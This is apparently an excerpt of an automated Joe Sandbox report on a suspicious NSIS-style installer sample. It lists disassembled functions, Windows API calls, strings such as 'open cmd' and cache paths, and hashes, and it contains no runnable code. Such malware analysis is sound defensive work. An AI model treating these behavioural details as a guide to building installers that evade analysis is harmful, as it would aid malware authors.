String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-905382516
Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Strings

open, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 0040179E
open cmd, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
API String ID: 1941528284-1328275964
Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

Strings

Completed, xrefs: 0040558A, 0040559A, 004055A0, 004055C3, 004055CF

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Completed
API String ID: 1495540970-3087654605
Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

... %d%%, xrefs: 004033D0
G8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Strings

UXTHEME, xrefs: 0040686D
%s%S.dll, xrefs: 004068B0
\, xrefs: 0040688C

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040602B
nsa, xrefs: 00406033

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1331003597
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A38: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
API String ID: 1892508949-3483070565
Opcode ID: f05bda5ccba1a2e5aa416980a25588bb69072d489e09a94885b650edebede0fb
Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
Opcode Fuzzy Hash: f05bda5ccba1a2e5aa416980a25588bb69072d489e09a94885b650edebede0fb
Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(0060B968), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

Strings

open, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
